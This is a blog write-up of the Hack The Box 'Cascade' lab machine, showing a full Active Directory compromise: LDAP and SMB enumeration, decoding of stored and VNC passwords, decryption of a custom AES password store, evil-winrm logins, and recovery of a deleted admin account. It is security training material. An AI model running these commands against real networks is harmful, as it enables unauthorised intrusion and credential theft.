Cascade Machine Walkthrough

Cascade Hackthebox Machine Detailed Walkthrough

“Your most unhappy customers are your greatest source of learning.” - Bill Gates

Machine Matrix

Machine Summary

Box is a windows machine that has Active Directory services running. Starting with, for a user account enocded password is stored in one of the account’s attributes which is retrived using ldap search. Upon enumerating the shares with the obtained credentials, VNC.reg file is witnessed from which we can crack the password for the user s.smith. Now for privilege escalation, again enumerating on shares with s.smith credentials gives us access to Audit.db that has custom encrypted password. We use the DnSpy to witness the encryption mechanisim. After decryption, we have credentials for account ArkSvc ( Service Account). We then use this account to recover a deleted account TempAdmin. Administrator’s password is same as TempAdmin.

Nmap Scan

I started the enumeration with nmap scan

nmap -sC -sV 10.10.10.182

The Box has 13 ports open

PortService
53domain
88kerberos-sec
135msrpc
139netbios-ssn
389ldap
445microsoft-ds
636tcpwrapped
3268ldap
3269tcpwrapped
49154msrpc
49155msrpc
49157ncacn_http
49158msrpc

Enumeration on port 139 and 445

I used smbclient to check whether anonymous login is allowed in the machine but it was unsuccessfull. I ran enum4linux to enumerate more

enum4linux 10.10.10.182

Usernames

CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

I checked whether any of these users have kerberos pre-authentication disabled, that would lead us to inital foothold but that didn’t workout.

Enumerating Using LDAP Queries

I started to enumerate the Active Directory using LDAP Queries

ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182

This gave a huge amount of result so i copied this result to a text file inorder to manually enumerate on it. This gave me a lead, I got a base64 encoded password in the object cascadeLegacyPwd of ryan thompson user (r.thompson)

Encoded password: clk0bjVldmE=
Decoded password: rY4n5eva

I tried to login on winrm using evilwinrm for obtained credentials but didn’t work.

Enumerating Shares with r.thompson credentials

Now i tried to enumerate on the shares with the obtained credentials of r.thompson. Thompson had access to certain shared folders.

smbclient //10.10.10.182/ -U r.thompson

I enumerated on each folders, upon enumeration i got VNC Install.reg file from \IT\Temp\s.smith\ Directory.

Acquiring User Shell - s.smith

I downloaded the file and started looking in to it. As it is an registry file, it had object which has the password in encoded form.

I thought it was in hex format but it wasn’t. Upon researching a bit, i got a tool for drypting the encoded password in VNC registry file. [vncpwd]https://aluigi.altervista.org/pwdrec/vncpwd.zip). I used this tool to decrypt the password

username: s.smith
password: sT333ve2

I used to evil-winrm to get the shell

evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

Privilege Escalation

Again i went to enumerate on shares with s.smith credentials,

smbclient //10.10.10.182/Audit$ -U s.smith

There is a file called Audit.db, that may be our way for privilege escalation. I simply checked the contents on the file using strings command

strings Audit.db

I found an hash which must be the password. I tried to decrypt the hash using john and hashcat but that didn’t work. I concluded that it must be a custom encrypted password.

Disassembling CascAudit.exe and CascCrypto.dll

On shares enumerating, we found an exec and a dll file CascAudit.exe and CascCrypto.dll. These files are used for encryption, hence these must be disassembled to find the encryption technique and decrypting it.

I imported CascAudit.exe and CascCrypto.dll on DnSpy. I noticed that the encryption technique used is AES 128 bit with CBC mode. I got the Secret Key (c4scadek3y654321) and IV Optional Key (1tdyjCbY1Ix49842)

I used the online AES decrypter to decrypt the password through providing the keys and the encrypted password.

username: arksvc
password: w3lc0meFr31nd

Upon enumeration of shares using the s.smith credentials, i got an log file (ArkAdRecycleBin.log) and a html file (Meeting_Notes_June_2018.html)

I downloaded these files and started to enumerate on it.

Acquiring Administrator Access

According to the log file TempAdmin User was deleted by ArkSvc user. Reading the Meeting_Notes_June_2018.html describes that the password for TempAdmin and Administrator are same.

So now if we are able to recover the TempAdmin password from the user who deleted TempAdmin (ArkSvc), we can have the administrator shell. I researched google on how to recover deleted accounts. I found a blog on how to recover the deleted accounts using powershell

Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

I ran this command in the shell of ArkSvc user

As expected we have an password encoded in base64 on the parameter cascadeLegacyPwd. I decoded it.

username: TempAdmin, Administrator
password: baCT3r1aN00dles

I got the administrator shell using evil-winrm with these credentials

Happy Hacking !


© 2020. All rights reserved to r3dw0lf_sec.

Powered by Hydejack v9.0.0-rc.6